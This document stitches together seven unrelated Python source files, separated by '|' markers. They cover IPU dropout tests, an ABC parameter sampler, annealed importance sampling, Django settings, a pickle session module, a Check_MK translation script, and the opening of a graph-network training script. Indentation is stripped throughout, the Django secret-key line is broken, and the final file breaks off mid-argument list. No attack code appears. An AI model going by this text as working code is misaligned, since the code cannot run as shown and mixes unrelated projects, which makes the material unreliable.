loss, s, _ = gen_poprand_ops.ipu_dropout(w, rate=0.5, scale=1.0)
g = gradients_impl.gradients(loss, [w])
assert len(g) == 1
dropout_grad = g[0]
assert dropout_grad.op.type == "IpuDropoutWithSeedAndReference"
return s, dropout_grad.op.outputs[1]
with ops.device("/device:IPU:0"):
out = ipu.ipu_compiler.compile(model, [])
cfg = ipu.config.IPUConfig()
cfg.auto_select_ipus = 1
tu.add_hw_ci_connection_options(cfg)
cfg.configure_ipu_system()
with sl.Session() as sess:
sess.run(variables.global_variables_initializer())
s_fwd, s_bwd = sess.run(out)
self.assertAllEqual(s_fwd, s_bwd)
s_fwd, s_bwd = sess.run(out)
self.assertAllEqual(s_fwd, s_bwd)
@tu.test_uses_ipus(num_ipus=1)
@test_util.deprecated_graph_mode_only
def testReuseSequence(self):
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def inner_loop(x):
@ipu.outlined_function
def f(z):
return gen_poprand_ops.ipu_dropout(z, rate=0.5, scale=1.0)
x, s1, _ = f(x)
x, s2, _ = f(x)
return x, outfeed_queue.enqueue([s1, s2])
def model(x):
return ipu.loops.repeat(10, inner_loop, [x])
with ops.device('cpu'):
inp = array_ops.placeholder(np.float32, [2], name="data")
with ops.device("/device:IPU:0"):
out = ipu.ipu_compiler.compile(model, [inp])
cfg = ipu.config.IPUConfig()
cfg.auto_select_ipus = 1
tu.add_hw_ci_connection_options(cfg)
cfg.configure_ipu_system()
outfeed_op = outfeed_queue.dequeue()
with sl.Session() as sess:
sess.run(out, {inp: [2, 4]})
s1, s2 = sess.run(outfeed_op)
seeds = list(zip(s1, s2))
for i, s in enumerate(seeds):
# Make sure the seeds are not the between the executions of the same
# function.
self.assertNotAllEqual(s[0], s[1])
# Make sure the seeds between iterations are different.
self.assertNotAllEqual(s, seeds[i - 1])
@tu.test_uses_ipus(num_ipus=4)
@test_util.deprecated_graph_mode_only
def testDropoutTrainingInPipeline(self):
def dataset_fn():
transform = np.roll(np.eye(100), 1, 1)
inputs = np.random.randn(1000, 100) / np.sqrt(100)
outputs = inputs @ transform
return Dataset.from_tensor_slices(
dict(
inputs=inputs.astype(np.float32),
outputs=outputs.astype(np.float32),
)).repeat().batch(32, drop_remainder=True)
def optimizer_fn():
return gradient_descent.GradientDescentOptimizer(0.1)
repeat_count = 32
pipeline_depth = 32
def stage1(inputs, outputs):
N = int(inputs.shape[-1])
x = inputs @ variable_scope.get_variable(
"w0",
shape=(N, N),
dtype=np.float32,
initializer=init_ops.zeros_initializer())
x = ipu.rand_ops.dropout(x)
return x, outputs
def stage2(inputs, outputs):
l = math_ops.reduce_mean(
math_ops.reduce_sum((outputs - inputs)**2, axis=-1))
return l
output = pipelining_test_util.PipelineTester.pipeline_on_ipu(
[stage1, stage2],
lambda: [], [],
repeat_count,
pipeline_depth,
dataset_fn,
optimizer_fn,
self,
10000,
recomp=True,
device_mapping=[0, 3],
schedule=ipu.pipelining_ops.PipelineSchedule.Grouped)
assert output[-1] < output[0]
@tu.test_uses_ipus(num_ipus=4)
@test_util.deprecated_graph_mode_only
def testDropoutTrainingInPipelineHighRate(self):
def dataset_fn():
transform = np.roll(np.eye(100), 1, 1)
inputs = np.random.randn(1000, 100) / np.sqrt(100)
outputs = inputs @ transform
return Dataset.from_tensor_slices(
dict(
inputs=inputs.astype(np.float32),
outputs=outputs.astype(np.float32),
)).repeat().batch(32, drop_remainder=True)
def optimizer_fn():
return gradient_descent.GradientDescentOptimizer(0.1)
repeat_count = 32
pipeline_depth = 32
def stage1(inputs, outputs):
N = int(inputs.shape[-1])
x = inputs @ variable_scope.get_variable(
"w0",
shape=(N, N),
dtype=np.float32,
initializer=init_ops.zeros_initializer())
x = ipu.rand_ops.dropout(x, rate=0.9)
return x, outputs
def stage2(inputs, outputs):
l = math_ops.reduce_mean(
math_ops.reduce_sum((outputs - inputs)**2, axis=-1))
return l
output = pipelining_test_util.PipelineTester.pipeline_on_ipu(
[stage1, stage2],
lambda: [], [],
repeat_count,
pipeline_depth,
dataset_fn,
optimizer_fn,
self,
10000,
recomp=True,
device_mapping=[0, 3],
schedule=ipu.pipelining_ops.PipelineSchedule.Grouped)
assert output[-1] < output[0]
@tu.test_uses_ipus(num_ipus=1)
@test_util.deprecated_graph_mode_only
def testDropoutTrainingInPipelineSameDevice(self):
def dataset_fn():
transform = np.roll(np.eye(100), 1, 1)
inputs = np.random.randn(1000, 100) / np.sqrt(100)
outputs = inputs @ transform
return Dataset.from_tensor_slices(
dict(
inputs=inputs.astype(np.float32),
outputs=outputs.astype(np.float32),
)).repeat().batch(32, drop_remainder=True)
def optimizer_fn():
return gradient_descent.GradientDescentOptimizer(0.1)
repeat_count = 32
pipeline_depth = 32
def stage1(inputs, outputs):
N = int(inputs.shape[-1])
x = inputs @ variable_scope.get_variable(
"w0",
shape=(N, N),
dtype=np.float32,
initializer=init_ops.zeros_initializer())
x = ipu.rand_ops.dropout(x, rate=0.9)
return x, outputs
def stage2(inputs, outputs):
l = math_ops.reduce_mean(
math_ops.reduce_sum((outputs - inputs)**2, axis=-1))
return l
output = pipelining_test_util.PipelineTester.pipeline_on_ipu(
[stage1, stage2],
lambda: [], [],
repeat_count,
pipeline_depth,
dataset_fn,
optimizer_fn,
self,
10000,
recomp=True,
device_mapping=[0, 0],
schedule=ipu.pipelining_ops.PipelineSchedule.Grouped)
assert output[-1] < output[0]
if __name__ == "__main__":
googletest.main()
|
#%%
import numpy as np
from itertools import repeat
from itertools import starmap
from scipy.stats import norm
class ABCer:
def __init__(self, iterations, particles, observations):
self.iterations = iterations
self.particles = particles
self.observations = observations
def initialize_model(self, model):
self.model = model
def initialize_parameters(self, paras):
self.parameters = paras
return self.parameters
def normalized_norm(self, x):
diff_norm = np.linalg.norm(x / self.observations - 1, axis=1)
max_err = np.nanmax(diff_norm)
return diff_norm / max_err
def purterbation(self, index, weight, para):
para_last_iteration = para[index]
weight_update = weight[index] / sum(weight[index])
mean_para_last = np.sum(para_last_iteration * weight_update)
var_para_last = np.sum(
(para_last_iteration - mean_para_last)**2 * weight_update)
sample_index = np.random.choice(index, self.particles, p=weight_update)
mean_sample_para = para[sample_index]
propose_para = np.random.normal(mean_sample_para,
np.sqrt(2 * var_para_last))
evolve_weight = weight_update[index.searchsorted(sample_index)]
evolve_weight_denominator = np.sum(evolve_weight * norm.pdf(
propose_para, mean_sample_para, np.sqrt(2 * var_para_last)))
evolve_weight_numerator = norm.pdf(propose_para, mean_para_last,
np.sqrt(2 * var_para_last))
evolve_weight = evolve_weight_numerator / evolve_weight_denominator
evolve_weight = evolve_weight / sum(evolve_weight)
return evolve_weight, propose_para
def ABC(self, prior_paras):
# initialize the first iteration
number_parameters = len(self.parameters)
if len(prior_paras) != number_parameters * 2:
return print(
"Provide the corresponding length of the prior information of the parameters!"
)
para_each_iteration = np.tile(self.parameters, (self.particles, 1))
for i in range(number_parameters):
para_each_iteration[:, i] = np.random.uniform(
prior_paras[2 * i], prior_paras[2 * i + 1],
para_each_iteration.shape[0])
# store parameter evolution
disct_parameters = dict.fromkeys(range(number_parameters), [])
for key, value in disct_parameters.items():
l = np.zeros(shape=(self.iterations + 1, self.particles))
l[0,:] = para_each_iteration[:,key]
disct_parameters[key] = l
# fitness
fitness = np.zeros(shape=(self.iterations, self.particles))
# weights
disct_parameter_weights = dict.fromkeys(range(number_parameters), [])
for key, value in disct_parameter_weights.items():
l = np.zeros(self.particles)
l.fill(1 / self.particles)
disct_parameter_weights[key] = l
for g in range(self.iterations):
packed_para = [[para_each_iteration[i, :]]
for i in range(para_each_iteration.shape[0])]
simulation_each_iter_list = list(starmap(self.model, packed_para))
distance = self.normalized_norm(simulation_each_iter_list)
fitness[g, :] = 1 - distance
q5 = np.argsort(
fitness[g, :])[-int(self.particles // 4)] # best 25%
fit_index = np.where(fitness[g, :] > fitness[g, q5])[0]
print('Mean estimates: parameters: %.3e ; %.3e ' %
(np.mean(para_each_iteration[fit_index, 0]),
np.mean(para_each_iteration[fit_index, 1])))
for i in range(number_parameters):
disct_parameter_weights[i], disct_parameters[i][
g + 1, :] = self.purterbation(fit_index,
disct_parameter_weights[i],
disct_parameters[i][g, :])
para_each_iteration[:, i] = disct_parameters[i][g+1,:]
disct_parameters['fitness'] = fitness
# np.save(output, para_data)
return disct_parameters
# test
#%%
if __name__ == '__main__':
import matplotlib.pyplot as plt
# Example
def model_test(para, time_survey=np.arange(18)):
# time_survey = np.arange(18)
y = para[0] * np.exp(para[1] * time_survey)
return y
y = model_test([1, 2])
observations=np.array([1.0, 7.0,10.0,24.0,38.0,82.0,128.0,188.0,265.0,321.0,382.0,503.0,614.0,804.0,959.0,1135.0,1413.0,1705.0])
time = np.arange(len(observations))
test_ABC = ABCer(100, 10000, observations=observations)
test_ABC.initialize_model(model_test)
test_ABC.initialize_parameters([0.0, 1.0])
test_list = test_ABC.ABC(prior_paras=[0.0, 1.0, 1.0, 2.0])
# %%
plt.plot(time,observations, 'o')
para_inferred = []
para_inferred.append(np.mean(test_list[0][20,:]))
para_inferred.append(np.mean(test_list[1][20,:]))
extend_time = np.arange(21)
y_inferred = model_test(para_inferred, np.arange(21))
plt.plot(extend_time,y_inferred,'x',color = 'r')
# %%
|
<reponame>wangkua1/BDMC
from __future__ import print_function
import numpy as np
from tqdm import tqdm
import torch
from torch.autograd import grad as torchgrad
from BDMC import hmc
from BDMC import utils
#
import matplotlib.pylab as plt
import torchvision.utils as vutils
import os
def ais_trajectory(model,
model_latent_dim,
model_decode_vector,
loader,
forward=True,
schedule=np.linspace(0., 1., 500),
n_sample=100,
log_likelihood_fn=utils.log_bernoulli,
log_prior_fn=None,
prior_sample_fn=None,
save_dir=None):
"""Compute annealed importance sampling trajectories for a batch of data.
Could be used for *both* forward and reverse chain in BDMC.
Args:
model (vae.VAE): VAE model
loader (iterator): iterator that returns pairs, with first component
being `x`, second would be `z` or label (will not be used)
forward (boolean): indicate forward/backward chain
schedule (list or 1D np.ndarray): temperature schedule, i.e. `p(z)p(x|z)^t`
n_sample (int): number of importance samples
Returns:
A list where each element is a torch.autograd.Variable that contains the
log importance weights for a single batch of data
"""
if log_prior_fn is None:
log_prior_fn = lambda z: utils.log_normal(z, torch.zeros_like(z), torch.zeros_like(z))
if prior_sample_fn is None:
prior_sample_fn = lambda B: torch.randn(B, model_latent_dim).cuda()
def log_f_i(z, data, t):
"""Unnormalized density for intermediate distribution `f_i`:
f_i = p(z)^(1-t) p(x,z)^(t) = p(z) p(x|z)^t
=> log f_i = log p(z) + t * log p(x|z)
"""
log_prior = log_prior_fn(z)
log_likelihood = log_likelihood_fn(model_decode_vector(z), data)
return log_prior + log_likelihood.mul_(t)
logws = []
for i, (batch, post_z) in enumerate(loader):
B = batch.size(0) * n_sample
batch = batch.cuda()
batch = utils.safe_repeat(batch, n_sample)
with torch.no_grad():
epsilon = torch.ones(B).cuda().mul_(0.01)
accept_hist = torch.zeros(B).cuda()
logw = torch.zeros(B).cuda()
# initial sample of z
if forward:
current_z = prior_sample_fn(B)
else:
current_z = utils.safe_repeat(post_z, n_sample).cuda()
# current_z = current_z.requires_grad_()
pbar = tqdm(enumerate(zip(schedule[:-1], schedule[1:]), 1))
for j, (t0, t1) in pbar:
current_z = current_z.detach()
current_z.requires_grad_()
# update log importance weight
log_int_1 = log_f_i(current_z, batch, t0).detach()
log_int_2 = log_f_i(current_z, batch, t1).detach()
logw += log_int_2 - log_int_1
# resample velocity
current_v = torch.randn(current_z.size()).cuda()
def U(z):
return -log_f_i(z, batch, t1).detach()
def grad_U(z):
# grad w.r.t. outputs; mandatory in this case
grad_outputs = torch.ones(B).cuda()
# torch.autograd.grad default returns volatile
# grad = torchgrad(U(z), z, grad_outputs=grad_outputs)[0]
grad = torchgrad(-log_f_i(z, batch, t1), z, grad_outputs=grad_outputs,retain_graph=False, create_graph=False)[0]
# clip by norm
max_ = B * model_latent_dim * 100.
grad = torch.clamp(grad, -max_, max_)
# grad.requires_grad_()
return grad.detach()
def normalized_kinetic(v):
zeros = torch.zeros(B, model_latent_dim).cuda()
return -utils.log_normal(v, zeros, zeros).detach()
z, v = hmc.hmc_trajectory(current_z, current_v, U, grad_U, epsilon)
# import ipdb; ipdb.set_trace()
current_z, epsilon, accept_hist = hmc.accept_reject(
current_z, current_v,
z, v,
epsilon,
accept_hist, j,
U, K=normalized_kinetic)
tmp = utils.log_mean_exp(logw.view(n_sample, -1).transpose(0, 1)).mean().item()
pbar.set_postfix_str(s=f'AIS: {tmp:.2f}', refresh=True)
if j % 10 == 1:
with torch.no_grad():
x = model_decode_vector(z)
h = w = int(np.sqrt(x.size(1)))
# Plot
def _plot(ims):
c, h, w = ims.shape[-3:]
grid = vutils.make_grid(ims.reshape(-1, c,h,w), nrow=8, padding=2, normalize=True)
plt.imshow(np.transpose(grid.numpy(), (1,2,0)))
plt.tight_layout()
plt.grid()
plt.xticks([])
plt.yticks([])
f, axs = plt.subplots(1, 2, figsize=(8,5))
plt.subplot(axs[0])
_plot(x.view(x.size(0),1,h, w)[:64].cpu())
plt.subplot(axs[1])
_plot(batch.view(x.size(0),1,h, w)[:64].cpu())
plt.savefig(os.path.join(save_dir,f'{j}.jpeg'), bbox_inches='tight', pad_inches=0, format='jpeg')
logw = utils.log_mean_exp(logw.view(n_sample, -1).transpose(0, 1))
if not forward:
logw = -logw
logws.append(logw.data.detach().cpu().numpy())
print('Last batch stats %.4f' % (logw.mean().cpu().data.numpy()))
# model.zero_grad()
# del log_int_1
# del log_int_2
# del logw
return logws
|
import os
from urllib.parse import urlparse
import dj_database_url
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = <KEY>'
SECRET_KEY = os.environ.setdefault("DJANGO_SECRET_KEY", SECRET_KEY)
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'pipeline',
'clear_cache',
'topics',
)
MIDDLEWARE = (
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.gzip.GZipMiddleware',
)
ROOT_URLCONF = 'codebook.urls'
if os.getenv("SITE_ID"):
SITE_ID = os.getenv("SITE_ID")
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'topics.settings_context.settings_context'
],
},
},
]
WSGI_APPLICATION = 'codebook.wsgi.application'
if os.getenv("DATABASE_URL"):
DATABASES = {'default': dj_database_url.config()}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
USE_ETAGS = True
APPEND_SLASH = True
# Logging
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'console': {
'class': 'logging.StreamHandler',
},
},
'loggers': {
'django': {
'handlers': ['console'],
'level': os.getenv('DJANGO_LOG_LEVEL', 'INFO'),
},
},
}
if os.environ.get('REDIS_URL'):
redis_url = urlparse(os.environ.get('REDIS_URL'))
CACHES = {
'default': {
'BACKEND': 'redis_cache.RedisCache',
'LOCATION': '{}:{}'.format(redis_url.hostname, redis_url.port),
'OPTIONS': {
'PASSWORD': redis_url.password,
'DB': 0,
}
}
}
else:
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
}
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/_static/'
STATIC_ROOT = 'static'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'pipeline.finders.PipelineFinder',
)
STATICFILES_STORAGE = 'pipeline.storage.PipelineManifestStorage'
WHITENOISE_MANIFEST_STRICT = False
PIPELINE = {
'STYLESHEETS': {
'style': {
'source_filenames': (
'css/main.scss',
),
'output_filename': 'css/style.css',
}
},
'JAVASCRIPT': {
'script': {
'source_filenames': (
'js/edit_page.coffee',
'js/tab_ajax.coffee',
'js/tag_hotkeys.coffee',
),
'output_filename': 'js/script.js',
},
},
'COMPILERS': (
'pipeline.compilers.sass.SASSCompiler',
'pipeline.compilers.coffee.CoffeeScriptCompiler'
),
"SASS_BINARY": 'pysassc',
"COFFEE_SCRIPT_BINARY": 'npx coffee',
'DISABLE_WRAPPER': True,
'CSS_COMPRESSOR': 'pipeline.compressors.NoopCompressor',
'JS_COMPRESSOR': 'pipeline.compressors.NoopCompressor'
}
LOGIN_REDIRECT_URL = '/'
LOGIN_URL = 'topics:login'
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
|
# -*- coding: utf-8 -*-
"""
This module have serializing methods for data persistence so to let the package "save" custom objects
session module made by Davtoh and powered by dill
Dependency project: https://github.com/uqfoundation/dill
"""
try:
# for security reason read this: http://www.benfrederickson.com/dont-pickle-your-data/
# download: https://pypi.python.org/pypi/dill#downloads
# see print dill.license() https://github.com/uqfoundation
# import jsonpickle as serializer # http://jsonpickle.github.io/
import cpickle as serializer
# import dill as serializer # dill must be >= 0.2.4
#__license__ = serializer.__license__
# dill.detect.trace(True)
except:
import pickle as serializer
import types
import os
from .root import secure_open
__excludeType = [types.FunctionType, types.ModuleType, type(None), type, type]
__excludeVar = []
__excludePattern = ['__']
def getEnviromentSession(enviroment=None):
"""
Gets the filtered session from the global variables.
:return: dictionary containing filtered session.
"""
enviroment = enviroment or globals()
#globals(), dir(), [type(enviroment[keys]) for keys in enviroment]
session = {}
for keys in list(enviroment.keys()):
if __excludePattern != [] and keys.startswith(*__excludePattern):
continue
if not (type(enviroment[keys]) in __excludeType or keys in __excludeVar):
session[keys] = enviroment[keys]
return session
def saveSession(filepath, session, helper=None):
"""
Saves dictionary session to file.
:param filepath: path to save session file.
:param session: dictionary
:param helper: function to pre-process session
:return: filename of saved session
"""
# safely save session file
# with os.fdopen(os.open(filepath, os.O_WRONLY | os.O_CREAT, 0600), 'wb')
# as logger: # http://stackoverflow.com/a/5624691/5288758
with secure_open(filepath, 'wb') as logger:
if helper:
serializer.dump(helper(session), logger,
serializer.HIGHEST_PROTOCOL) # save dictionary
else:
# save dictionary
serializer.dump(session, logger, serializer.HIGHEST_PROTOCOL)
return logger.name
def readSession(filepath, helper=None):
"""
Loads a dictionary session from file.
:param filepath: path to load session file.
:param helper: function to pos-process session file
:return: session
"""
# safely read session file
with secure_open(filepath, 'rb') as logger:
session = serializer.load(logger) # get session
if helper:
return helper(session)
else:
return session
def updateSession(filepath, session, replace=True, rdhelper=None, svhelper=None):
"""
Updates a dictionary session in file.
:param filepath: path to session file.
:param session: dictionary.
:param replace: if True key values are replaced else old key values ar kept.
:param rdhelper: read helper.
:param svhelper: save helper.
:return: None
"""
current = readSession(filepath, rdhelper)
if replace: # update by replacing existing values
current.update(session)
else: # update without replacing existing values
for key in session:
if key not in current:
current[key] = session[key]
saveSession(filepath, current, svhelper) # save updated session
def flushSession(filepath):
"""
Empty session in file.
:param filepath: path to session file.
:return:
"""
readSession(filepath)
saveSession(filepath, {}) # save updated session
def checkFromSession(filepath, varlist):
"""
Check that variables exits in session file.
:param filepath: path to session file.
:param varlist: list of variables to checkLoaded.
:return: list checkLoaded results
"""
current = readSession(filepath)
return [var in current for var in varlist] # checking variables
def deleteFromSession(filepath, varlist):
"""
Delete variables from session file.
:param filepath: path to session file.
:param varlist: list of variables to delete.
:return: None
"""
current = readSession(filepath)
for var in varlist: # deleting variables
del(current[var])
saveSession(filepath, current) # save updated session
|
<gh_stars>0
#!/usr/bin/python
# -*- encoding: utf-8; py-indent-offset: 4 -*-
# +------------------------------------------------------------------+
# | ____ _ _ __ __ _ __ |
# | / ___| |__ ___ ___| | __ | \/ | |/ / |
# | | | | '_ \ / _ \/ __| |/ / | |\/| | ' / |
# | | |___| | | | __/ (__| < | | | | . \ |
# | \____|_| |_|\___|\___|_|\_\___|_| |_|_|\_\ |
# | |
# | Copyright <NAME> 2014 <EMAIL> |
# +------------------------------------------------------------------+
#
# This file is part of Check_MK.
# The official homepage is at http://mathias-kettner.de/check_mk.
#
# check_mk is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation in version 2. check_mk is distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY; with-
# out even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE. See the GNU General Public License for more de-
# tails. You should have received a copy of the GNU General Public
# License along with GNU Make; see the file COPYING. If not, write
# to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
# Boston, MA 02110-1301 USA.
import sys, getopt, os, datetime
class LocalizeException(Exception):
def __init__(self, reason):
self.reason = reason
def __str__(self):
return self.reason
def verbose_system(command):
if opt_verbose:
sys.stdout.write("Running %s...\n" % command)
return os.system(command)
domain = 'multisite'
pot_file = None
po_file = None
mo_file = None
alias_file = None
if local_locale_dir:
locale_base = local_locale_dir
else:
locale_base = locale_dir
if local_locale_dir and os.path.exists(local_locale_dir + '/multisite.pot'):
pot_file = local_locale_dir + '/multisite.pot'
else:
pot_file = locale_base + '/multisite.pot'
try:
os.makedirs(locale_base)
except:
pass
def localize_usage(err = ''):
sys.stdout.write("""Usage: check_mk [-v] --localize COMMAND [ARGS]
Available commands are:
update LANG [ALIAS] ... Creates or updates a .po file for the given
language. The alias is an optional attribute
which will be used as display string in the
Multisite GUI.
compile LANG ... Compiles the .po file into a .mo file which can
be used by gettext.
edit LANG ... Call update, open .po in editor and compile in one step
The regular process for translating is:
1.) Create/update the .po file for the given language
2.) Edit the .po file
3.) Compile the .po file to get a .mo file which can be used by gettext
Locale files are located in: %s
""" % locale_base)
def do_localize(args):
if len(args) == 0:
localize_usage()
sys.exit(1)
command = args[0]
if len(args) > 1:
lang = args[1]
else:
lang = None
alias = None
if len(args) > 2:
alias = args[2]
commands = {
"update" : localize_update,
"compile" : localize_compile,
"edit" : localize_edit,
}
f = commands.get(command)
if f:
check_binaries()
try:
f(lang)
write_alias(alias)
except LocalizeException, e:
sys.stderr.write("%s\n" % e)
sys.exit(1)
else:
allc = commands.keys()
allc.sort()
allc = [ tty_bold + c + tty_normal for c in allc ]
sys.stderr.write("Invalid localize command. Allowed are: %s and %s.\n" %
(", ".join(allc[:-1]), allc[-1]))
sys.exit(1)
def write_alias(alias):
if not alias:
return
if alias == '-':
os.remove(alias_file)
else:
file(alias_file, 'w').write(alias)
def check_binaries():
# Are the xgettext utils available?
for b in [ 'xgettext', 'msgmerge', 'msgfmt' ]:
if os.system('which %s >/dev/null 2>&1' % b):
raise LocalizeException('%s binary not found in PATH\n' % b)
def get_languages():
return [ l for l in os.listdir(locale_base) if os.path.isdir(locale_base + '/' + l) ]
def init_files(lang):
global po_file, mo_file, alias_file
po_file = locale_base + '/%s/LC_MESSAGES/%s.po' % (lang, domain)
mo_file = locale_base + '/%s/LC_MESSAGES/%s.mo' % (lang, domain)
alias_file = locale_base + '/%s/alias' % (lang)
def localize_update_po():
# Merge the current .pot file with a given .po file
if opt_verbose:
sys.stdout.write("Merging translations...")
if verbose_system('msgmerge -U %s %s >/dev/null' % (po_file, pot_file)) != 0:
sys.stderr.write('Failed!\n')
else:
sys.stdout.write('Success! Output: %s\n' % po_file)
def localize_init_po(lang):
if verbose_system('msginit -i %s --no-translator -l %s -o %s >/dev/null' % \
(pot_file, lang, po_file)) != 0:
sys.stderr.write('Failed!\n')
# Dig into the source code and generate a new .pot file
def localize_sniff():
sys.stdout.write('Sniffing source code...\n')
paths = [ default_config_dir, web_dir ]
if local_web_dir and os.path.exists(local_web_dir):
paths.append(local_web_dir)
if verbose_system('xgettext --no-wrap --sort-output --force-po '
'-L Python --from-code=utf-8 --omit-header '
'-o %s $(find %s -type f -name \*.py -o -name \*.mk | xargs) >/dev/null' % \
(pot_file, ' '.join(paths))) != 0:
sys.stderr.write('Failed!\n')
else:
header = '''# +------------------------------------------------------------------+
# | ____ _ _ __ __ _ __ |
# | / ___| |__ ___ ___| | __ | \/ | |/ / |
# | | | | '_ \ / _ \/ __| |/ / | |\/| | ' / |
# | | |___| | | | __/ (__| < | | | | . \ |
# | \____|_| |_|\___|\___|_|\_\___|_| |_|_|\_\ |
# | |
# | Copyright <NAME> 2010 <EMAIL> |
# +------------------------------------------------------------------+
#
# This file is part of Check_MK.
# The official homepage is at http://mathias-kettner.de/check_mk.
#
# check_mk is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation in version 2. check_mk is distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY; with-
# out even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE. See the GNU General Public License for more de-
# tails. You should have received a copy of the GNU General Public
# License along with GNU Make; see the file COPYING. If not, write
# to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
# Boston, MA 02110-1301 USA.
msgid ""
msgstr ""
"Project-Id-Version: Check_MK Multisite translation 0.1\\n"
"Report-Msgid-Bugs-To: <EMAIL>\\n"
"POT-Creation-Date: 2011-05-13 09:42+0200\\n"
"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\\n"
"Last-Translator: <NAME> <EMAIL@ADDRESS>\\n"
"Language-Team: LANGUAGE <<EMAIL>>\\n"
"Language: LANGUAGE \\n"
"MIME-Version: 1.0\\n"
"Content-Type: text/plain; charset=utf-8\\n"
"Content-Transfer-Encoding: 8bit\\n"
'''
f = open(pot_file).read()
open(pot_file, 'w').write(header + f)
sys.stdout.write('Success! Output: %s\n' % pot_file)
def localize_edit(lang):
localize_update(lang)
editor = os.getenv("VISUAL", os.getenv("EDITOR", "/usr/bin/vi"))
if not os.path.exists(editor):
editor = 'vi'
if 0 == verbose_system("%s '%s'" % (editor, po_file)):
localize_compile(lang)
else:
sys.stderr.write("Aborted.\n")
# Start translating in a new language
def localize_update(lang):
if not lang:
raise LocalizeException('No language given')
init_files(lang)
try:
os.makedirs(os.path.dirname(po_file))
except:
pass
# Maybe initialize the file in the local hierarchy with the file in
# the default hierarchy
if local_locale_dir and not os.path.exists(po_file) \
and os.path.exists(locale_dir + '/%s/LC_MESSAGES/%s.po' % (lang, domain)):
file(po_file, 'w').write(file(locale_dir + '/%s/LC_MESSAGES/%s.po' % (lang, domain)).read())
sys.stdout.write('Initialize %s with the file in the default hierarchy\n' % po_file)
localize_sniff()
if not os.path.exists(po_file):
sys.stdout.write('Initializing .po file for language %s...\n' % lang)
localize_init_po(lang)
else:
sys.stdout.write('Updating .po file for language %s...\n' % lang)
localize_update_po()
# Create a .mo file from the given .po file
def localize_compile(lang):
if not lang:
raise LocalizeException('No language given')
if lang not in get_languages():
raise LocalizeException('Invalid language given. Available: %s' % ' '.join(get_languages()))
init_files(lang)
# Maybe initialize the file in the local hierarchy with the file in
# the default hierarchy
if local_locale_dir and not os.path.exists(po_file) \
and os.path.exists(locale_dir + '/%s/LC_MESSAGES/%s.po' % (lang, domain)):
file(po_file, 'w').write(file(locale_dir + '/%s/LC_MESSAGES/%s.po' % (lang, domain)).read())
sys.stdout.write('Initialize %s with the file in the default hierarchy\n' % po_file)
if not os.path.exists(po_file):
raise LocalizeException('The .po file %s does not exist.' % po_file)
if verbose_system('msgfmt %s -o %s' % (po_file, mo_file)) != 0:
sys.stderr.write('Failed!\n')
else:
sys.stdout.write('Success! Output: %s\n' % mo_file)
|
# -*- coding: utf-8 -*-
import numpy as np
import scipy.sparse as sp
import torch
import random
import argparse
import os
import warnings
warnings.filterwarnings("ignore")
from utils import process
from utils import aug
from modules.gcn import GCNLayer
from net.merit import MERIT
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
def str_to_bool(value):
if isinstance(value, bool):
return value
if value.lower() in {'false', 'f', '0', 'no', 'n'}:
return False
elif value.lower() in {'true', 't', '1', 'yes', 'y'}:
return True
raise ValueError(f'{value} is not a valid boolean value')
parser = argparse.ArgumentParser()
parser.add_argument('--device', type=str, default='cuda:0')
parser.add_argument('--seed', type=int, default=2021)
parser.add_argument('--data', type=str, default='citeseer')
parser.add_argument('--runs', type=int, default=1)
parser.add_argument('--eval_every', type=int, default=10)
parser.add_argument('--epochs', type=int, default=500)
parser.add_argument('--lr', type=float, default=3e-4)
parser.add_argument('--weight_decay', type=float, default=0.0)
parser.add_argument('--batch_size', type=int, default=4)
parser.add_argument('--sample_size', type=int, default=2000)
parser.add_argument('--patience', type=int, default=100)
parser.add_argument('--sparse', type=str_to_bool, default=True)
parser.add_argument('--input_dim', type=int, default=3703)
parser.add_argument('--gnn_dim', type=int, default=512)
parser.add_argument('--proj_dim', type=int, default=512)
parser.add_argument('--proj_hid', type=int, default=4096)
parser.add_argument('--pred_dim', type=int, default=512)
parser.add_argument('--pred_hid', type=int, default=4096)
